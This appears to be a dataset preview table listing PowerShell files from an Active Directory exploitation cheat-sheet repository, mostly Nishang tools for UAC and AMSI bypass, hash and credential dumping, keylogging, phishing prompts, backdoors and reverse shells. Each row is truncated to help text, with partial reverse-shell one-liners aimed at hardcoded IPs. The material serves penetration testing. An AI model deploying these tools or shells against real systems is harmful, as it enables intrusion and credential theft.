source stringclasses 1
value | repo stringclasses 33
values | repo_url stringclasses 33
values | path stringlengths 7 179 | language stringclasses 1
value | license stringclasses 4
values | stars int64 2.27k 53.4k | ref stringclasses 4
values | size_bytes int64 48 259k | text stringlengths 48 259k |
|---|---|---|---|---|---|---|---|---|---|
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Escalation/Invoke-PsUACme.ps1 | PowerShell | mit | 2,733 | master | 50,736 | function Invoke-PsUACme
{
<#
.SYNOPSIS
Nishang script which uses known methods to bypass UAC.
.DESCRIPTION
This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wus... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/MITM/Invoke-Interceptor.ps1 | PowerShell | mit | 2,733 | master | 26,269 | function Invoke-Interceptor
{
<#
.SYNOPSIS
Nishang script which is capable of intercepting HTTPS requests by setting up a proxy server and log them to a file.
.DESCRIPTION
This experimental script, written by Casey Smith (@subTee), demonstrates the ability to capture and tamper with Web sessions.
For secure session... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1 | PowerShell | mit | 2,733 | master | 5,055 | #Requires -Modules ActiveDirectory
# If you do not have AD module, you can refer to the following link.
# https://github.com/samratashok/ADModule
function Add-ConstrainedDelegationBackdoor
{
<#
.SYNOPSIS
Nishang Script which could add constrained delegation backdoor service accounts or add constrained delegation back... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/ActiveDirectory/Set-DCShadowPermissions.ps1 | PowerShell | mit | 2,733 | master | 8,839 | function Set-DCShadowPermissions
{
<#
.SYNOPSIS
Nishang script which can be used to modify AD objects to provide minimal permissions required for DCShadow.
.DESCRIPTION
The script modifies ACLs to provide minimal permissions to AD objects for DCShadow technique. The script needs DA privileges
to do so. Mimikatz can ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Pivot/Create-MultipleSessions.ps1 | PowerShell | mit | 2,733 | master | 3,435 | function Create-MultipleSessions
{
<#
.SYNOPSIS
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.
.DESCRIPTION
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Pivot/Invoke-NetworkRelay.ps1 | PowerShell | mit | 2,733 | master | 10,301 | function Invoke-NetworkRelay
{
<#
.SYNOPSIS
Nishang script which can be used to run netsh port forwarding/relaying commands on remote computers.
.DESCRIPTION
This script is a wrapper around the netsh Windows command's portproxy functionality. It could be used to create and remove
network relays between computers... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Bypass/Invoke-AmsiBypass.ps1 | PowerShell | mit | 2,733 | master | 63,342 | function Invoke-AmsiBypass
{
<#
.SYNOPSIS
Nishang script which uses publicly known methods to bypass/avoid AMSI.
.DESCRIPTION
This script implements publicly known methods bypass or avoid AMSI on Windows machines.
AMSI is a script malware detection mechanism enabled by default in Windows 10.
(https://msdn.microsoft... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Misc/Speak.ps1 | PowerShell | mit | 2,733 | master | 532 | function Speak
{
<#
.SYNOPSIS
Nishang Payload to which "speaks" the given sentence
.DESCRIPTION
This payload uses the Speech API and the given senetence
is spoken in the MS Narrator's voice.
.PARAMETER Sentence
The sentence to be spoken
.EXAMPLE
PS > Speak <senetence>
.LINK
http://labofapenetrationtester.blogspot.... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Check-VM.ps1 | PowerShell | mit | 2,733 | master | 6,931 | function Check-VM
{
<#
.SYNOPSIS
Nishang script which detects whether it is in a known virtual machine.
.DESCRIPTION
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
Xen and QEMU for detecting the environment.
.EXAMPLE
PS > Check-VM
.LINK
http://www.labofapenet... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Get-PassHashes.ps1 | PowerShell | mit | 2,733 | master | 17,173 | function Get-PassHashes {
<#
.SYNOPSIS
Nishang payload which dumps password hashes.
.DESCRIPTION
The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
(but not SYSTEM privs as for the original powerdump written by David Kennedy)
.EX... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Get-Information.ps1 | PowerShell | mit | 2,733 | master | 3,630 | function Get-Information
{
<#
.SYNOPSIS
Nishang Payload which gathers juicy information from the target.
.DESCRIPTION
This payload extracts information form registry and some commands.
The information available would be dependent on the privilege with which the script would be executed.
.EXAMPLE
PS > Get-Informatio... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Get-WebCredentials.ps1 | PowerShell | mit | 2,733 | master | 825 | function Get-WebCredentials
{
<#
.SYNOPSIS
Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)
.DESCRIPTION
This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script
also needs PowerShell v3 onwards and must be run from ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Invoke-SessionGopher.ps1 | PowerShell | mit | 2,733 | master | 41,944 | function Invoke-SessionGopher
{
<#
.SYNPOSIS
Extracts and decrypts saved session information for software typically used to access Unix systems.
.DESCRIPTION
Queries HKEY_USERS for PuTTY, WinSCP, and Remote Desktop saved sessions. Decrypts saved passwords for WinSCP.
Extracts FileZilla, SuperPuTTY's saved session in... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Copy-VSS.ps1 | PowerShell | mit | 2,733 | master | 2,434 | function Copy-VSS
{
<#
.SYNOPSIS
Nishang Payload which copies the SAM file (and ntds.dit and SYSTEM hive if run on a Domain Controller).
.DESCRIPTION
This payload uses the VSS service (starts it if not running), creates a shadow of C:
and copies the SAM file which could be used to dump password hashes from it. If the... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Keylogger.ps1 | PowerShell | mit | 2,733 | master | 14,376 | <#
.SYNOPSIS
Nishang Payload which logs keys.
.DESCRIPTION
This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded
using the Parse_Key script in nishang.
.P... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/FireBuster.ps1 | PowerShell | mit | 2,733 | master | 2,109 | function FireBuster{
<#
.SYNOPSIS
This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine.
.DESCRIPTION
FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be V... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Show-TargetScreen.ps1 | PowerShell | mit | 2,733 | master | 6,112 | function Show-TargetScreen
{
<#
.SYNOPSIS
Nishang script which can be used for streaming a target's desktop using MJPEG.
.DESCRIPTION
This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening
on a port when using the -Reverse switch. Also, a standard netcat ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Get-WLAN-Keys.ps1 | PowerShell | mit | 2,733 | master | 658 | function Get-Wlan-Keys
{
<#
.SYNOPSIS
Nishang Payload which dumps keys for WLAN profiles.
.DESCRIPTION
This payload dumps keys in clear text for saved WLAN profiles.
The payload must be run from as administrator to get the keys.
.EXAMPLE
PS > Get-WLAN-Keys
.LINK
http://poshcode.org/1700
https://github.com/samratash... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/FireListener.ps1 | PowerShell | mit | 2,733 | master | 2,699 | function FireListener
{
<#
.SYNOPSIS
This script is part of Nishang. FireListener is a PowerShell script that does egress testing. It is to be run on the attacking/listening machine.
.DESCRIPTION
FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machin... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Invoke-SSIDExfil.ps1 | PowerShell | mit | 2,733 | master | 5,275 |
function Invoke-SSIDExfil
{
<#
.SYNOPSIS
Nishang script which can exfiltrate information like user credentials, using WLAN SSID.
.DESCRIPTION
In the default operation (without any option), the script opens a prompt which asks for user credentials and does not go away till valid local or domain credentials are entere... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Get-LSASecret.ps1 | PowerShell | mit | 2,733 | master | 8,865 | function Get-LsaSecret {
<#
.SYNOPSIS
Nishang script which extracts LSA Secrets from local computer.
.DESCRIPTION
Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer.
The payload must be run with elevated permissions, in 32-bit mode and requires
permissions to the security key in HKLM. The ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Invoke-Mimikittenz.ps1 | PowerShell | mit | 2,733 | master | 21,511 | function Invoke-Mimikittenz
{
<#
.SYNOPSIS
Extracts juicy info from memory.
.DESCRIPTION
Utilizes Windows function ReadProcessMemory() to extract juicy information from target process memory using regex.
Author: Jamieson O'Reilly (https://au.linkedin.com/in/jamieson-o-reilly-13ab6470)
License: https://creativecommon... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Invoke-CredentialsPhish.ps1 | PowerShell | mit | 2,733 | master | 1,604 | function Invoke-CredentialsPhish
{
<#
.SYNOPSIS
Nishang script which opens a user credential prompt.
.DESCRIPTION
This payload opens a prompt which asks for user credentials and does not go away till valid local or domain credentials are entered in the prompt.
.EXAMPLE
PS > Invoke-CredentialsPhish
.LINK
http://labof... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Gather/Get-PassHints.ps1 | PowerShell | mit | 2,733 | master | 2,493 | function Get-PassHints {
<#
.SYNOPSIS
Nishang script which extracts password hint for users in clear text.
.DESCRIPTION
The script extracts password hints from SAM registry hive. The script needs Administrator privs to read SAM hive.
.EXAMPLE
PS > Get-PassHints
.LINK
http://www.labofapenetrationtester.com/201... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Prasadhak/Invoke-Prasadhak.ps1 | PowerShell | mit | 2,733 | master | 3,811 | function Invoke-Prasadhak
{
<#
.SYNOPSIS
Nishang script which checks running processes for malwares.
.DESCRIPTION
This script uses takes md5 hashes of running processes (the correspondibg executable)
on the target system and search the hashes in the Virustotal database using the Public API.
.PARAMETER APIKEY
THe AP... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PoshRatHttps.ps1 | PowerShell | mit | 2,733 | master | 9,669 | function Invoke-PoshRatHttps
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse interactive PowerShell from a target over HTTPS.
.DESCRIPTION
This script starts a listener on the attacker's machine. The listener listens on Port 443 by default.
On the target machine execute the below command from PowerShell:... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellIcmp.ps1 | PowerShell | mit | 2,733 | master | 4,125 | function Invoke-PowerShellIcmp
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
.DESCRIPTION
This script can receive commands from a server, execute them and return the result to the server using only ICMP.
The server to be used with it is icmpsh_m.py fro... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 | PowerShell | mit | 2,733 | master | 983 | #A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
#$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-JSRatRegsvr.ps1 | PowerShell | mit | 2,733 | master | 6,461 | function Invoke-JSRatRegsvr
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse shell from a target over HTTP using regsvr32.exe. Useful for bypassing Applocker.
.DESCRIPTION
This script starts a listener on the attacker's machine. The listener needs a port to listen.
On the target machine execute the below c... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Remove-PoshRat.ps1 | PowerShell | mit | 2,733 | master | 1,023 | function Remove-PoshRat
{
<#
.SYNOPSIS
Nishang script which removes firewall rules installed by PoshRat.
.DESCRIPTION
Use this script to remove firewall rules installed by PoshRat.
Firewall rules with the name of
"Windows Update HTTPS" are removed by this script.
The script must be run from an elevated shell.
.PAR... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellUdp.ps1 | PowerShell | mit | 2,733 | master | 5,689 | function Invoke-PowerShellUdp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target over UDP.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a UDP port when using the -Reverse switch.
Also, a standard netcat can connect to this script... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PoshRatHttp.ps1 | PowerShell | mit | 2,733 | master | 6,767 | function Invoke-PoshRatHttp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse interactive PowerShell from a target over HTTP.
.DESCRIPTION
This script starts a listener on the attacker's machine. The listener needs a port to listen.
On the target machine execute the below command from PowerShell:
iex (New-... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-JSRatRundll.ps1 | PowerShell | mit | 2,733 | master | 7,330 | function Invoke-JSRatRundll
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse shell from a target over HTTP using rundll32.exe.
.DESCRIPTION
This script starts a listener on the attacker's machine. The listener needs a port to listen.
On the target machine execute the below command:
rundll32.exe javascrip... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PsGcat.ps1 | PowerShell | mit | 2,733 | master | 11,034 | function Invoke-PSGcat
{
<#
.SYNOPSIS
Nishang script which can be used to send commands and scripts to Gmail which can then be run on a target using Invoke-PSGcatAgent.
.DESCRIPTION
This script is capable of sending commands and/or scripts to Gmail. A valid Gmail username and password is required.
The command is compr... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellUdpOneLine.ps1 | PowerShell | mit | 2,733 | master | 713 | #Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well.
#$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("192.168.254.226"),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellTcp.ps1 | PowerShell | mit | 2,733 | master | 4,339 | function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a s... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-ConPtyShell.ps1 | PowerShell | mit | 2,733 | master | 24,118 | #Requires -Version 2
function Invoke-ConPtyShell
{
<#
.SYNOPSIS
ConPtyShell - Fully Interactive Reverse Shell for Windows
Author: splinter_code
License: MIT
Source: https://github.com/antonioCoco/ConPtyShell
.DESCRIPTION
ConPt... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PsGcatAgent.ps1 | PowerShell | mit | 2,733 | master | 6,390 | function Invoke-PsGcatAgent
{
<#
.SYNOPSIS
Nishang script which can be used to execute commands and scripts from Gmail uploaded by Invoke-PSGcat.
.DESCRIPTION
This script is capable of executing commands and/or scripts from Gmail and send the output back.
A valid Gmail username and password is required.
This script m... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellTcpOneLineBind.ps1 | PowerShell | mit | 2,733 | master | 665 | #Uncomment and change the hardcoded port number (443) in the below line. Remove this help comment as well.
#$listener = [System.Net.Sockets.TcpListener]443;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Len... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Shells/Invoke-PowerShellWmi.ps1 | PowerShell | mit | 2,733 | master | 14,194 | function Invoke-PowerShellWmi{
<#
.SYNOPSIS
Nishang script which can be used for interactive PowerShell over WMI.
.DESCRIPTION
Executing commands using WMI does not return output. This script utilizes WMI Namespaces to temporarily store the
output in Base64 encoded form and returns it to the attacker's machine. T... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Scan/Invoke-BruteForce.ps1 | PowerShell | mit | 2,733 | master | 12,964 | function Invoke-BruteForce
{
<#
.SYNOPSIS
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Local Accounts, Web and FTP.
.DESCRIPTION
This payload can brute force credentials for SQL Server, ActiveDirectory, LocalAccounts, Web or FTP.
.PARAMETER Computername
Specifies a SQL S... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Scan/Invoke-PortScan.ps1 | PowerShell | mit | 2,733 | master | 4,386 | function Invoke-PortScan {
<#
.SYNOPSIS
Nihsang payload which Scan IP-Addresses, Ports and HostNames
.DESCRIPTION
Scan for IP-Addresses, HostNames and open Ports in your Network.
.PARAMETER StartAddress
StartAddress Range
.PARAMETER EndAddress
EndAddress Range
.PARAMETER ResolveHost
Resolve HostName
.PARAMETER... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Invoke-ADSBackdoor.ps1 | PowerShell | mit | 2,733 | master | 4,385 | function Invoke-ADSBackdoor{
<#
.SYNOPSIS
Nishang Script that will use Alternate Data Streams and Windows Registry to achieve persistence.
Author: Matt Nelson (@enigma0x3)
.DESCRIPTION
This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by
using two Alternate Da... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Execute-OnTime.ps1 | PowerShell | mit | 2,733 | master | 12,739 | function Execute-OnTime
{
<#
.SYNOPSIS
Nishang Payload which waits till given time to execute a script.
.DESCRIPTION
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decod... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Gupt-Backdoor.ps1 | PowerShell | mit | 2,733 | master | 6,122 | function Gupt-Backdoor
{
<#
.SYNOPSIS
Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
.DESCRIPTION
Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of
each SSID with ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Set-RemotePSRemoting.ps1 | PowerShell | mit | 2,733 | master | 5,597 | function Set-RemotePSRemoting
{
<#
.SYNOPSIS
Nishang script which can be used to modify Security Descriptors of PowerShell Remoting to provide access for non-admin domain users.
.DESCRIPTION
The script takes a username and adds FUll Control (Generic All) to the ACL of PowerShell Remoting
The script needs elevat... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Add-ScrnSaveBackdoor.ps1 | PowerShell | mit | 2,733 | master | 5,077 | function Add-ScrnSaveBackdoor
{
<#
.SYNOPSIS
Nishang Script which could set Debugger registry keys for a screensaver to remotely execute commands and scripts.
.DESCRIPTION
The script reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
to check for the existing Screensaver. If... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Add-ConstrainedDelegationBackdoor.ps1 | PowerShell | mit | 2,733 | master | 5,049 | #Requires -Modules ActiveDirectory
# If you do not have AD module, you can refer to the following link.
# https://github.com/samratashok/ADModule
function Add-ConstrainedDelegationBackdoor
{
<#
.SYNOPSIS
Nishang Script which could add constrained delegation backdoor service accounts or add constrained delegation back... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/DNS_TXT_Pwnage.ps1 | PowerShell | mit | 2,733 | master | 18,593 | function DNS_TXT_Pwnage
{
<#
.SYNOPSIS
A backdoor capable of recieving commands and PowerShell scripts from DNS TXT queries.
.DESCRIPTION
This script continuously queries a domain's TXT records. It could be sent commands and powershell scripts using the TXT records which are executed on the target machine.
The PowerSh... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/HTTP-Backdoor.ps1 | PowerShell | mit | 2,733 | master | 13,572 | function HTTP-Backdoor
{
<#
.SYNOPSIS
Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
.DESCRIPTION
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payl... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Backdoors/Add-RegBackdoor.ps1 | PowerShell | mit | 2,733 | master | 1,741 | function Add-RegBackdoor
{
<#
.SYNOPSIS
Nishang Script which could set Debugger registry keys for Sticky Keys (sethc.exe) and Utilman (utilman.exe) to remotely execute commands and scripts.
.DESCRIPTION
This script can be used to set Debugger keys for Sticky Keys (sethc.exe) and Utilman (utilman.exe).
The payload ge... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Powermad/Invoke-DNSUpdate.ps1 | PowerShell | mit | 2,733 | master | 75,783 | function Invoke-DNSUpdate
{
<#
.SYNOPSIS
This function performs secure and nonsecure DNS dynamic updates against an AD domain controller. Authentication
for secure updates is performed through Kerberos GSS-TSIG.
Author: Kevin Robertson (@kevin_robertson)
License: BSD 3-Clause
.DESCR... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Powermad/Powermad.ps1 | PowerShell | mit | 2,733 | master | 135,586 | <#
Powermad - PowerShell MachineAccountQuota and DNS exploit tools
Author: Kevin Robertson (@kevin_robertson)
License: BSD 3-Clause
https://github.com/Kevin-Robertson/Powermad
#>
#region begin MachineAccountQuota Functions
function Disable-MachineAccount
{
<#
.SYNOPSIS
This function disables a machine ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Powermad/Powermad.psm1 | PowerShell | mit | 2,733 | master | 201 | <#
.SYNOPSIS
Powermad - PowerShell MachineAccountQuota and DNS exploit tools
.LINK
https://github.com/Kevin-Robertson/Powermad
#>
Import-Module $PWD\Powermad.ps1
Import-Module $PWD\Invoke-DNSUpdate.ps1 |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/NetCease/NetCease.ps1 | PowerShell | mit | 2,733 | master | 4,336 | param([switch]$Revert)
function IsAdministrator
{
param()
$currentUser = [Security.Principal.WindowsIdentity]::GetCurrent()
(New-Object Security.Principal.WindowsPrincipal($currentUser)).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
function BackupRegistryValue
{
param([string... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/DAMP-master/RemoteHashRetrieval.ps1 | PowerShell | mit | 2,733 | master | 69,292 | #region PSReflect
function New-InMemoryModule
{
<#
.SYNOPSIS
Creates an in-memory assembly and module
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
When defining custom enums, structs, and unmanaged functions, it is
necessary to... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/DAMP-master/Add-RemoteRegBackdoor.ps1 | PowerShell | mit | 2,733 | master | 14,041 | function Add-RemoteRegBackdoor {
<#
.SYNOPSIS
Implements a new remote registry backdoor that allows for the remote retrieval of
a system's machine account hash.
Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Ad... |
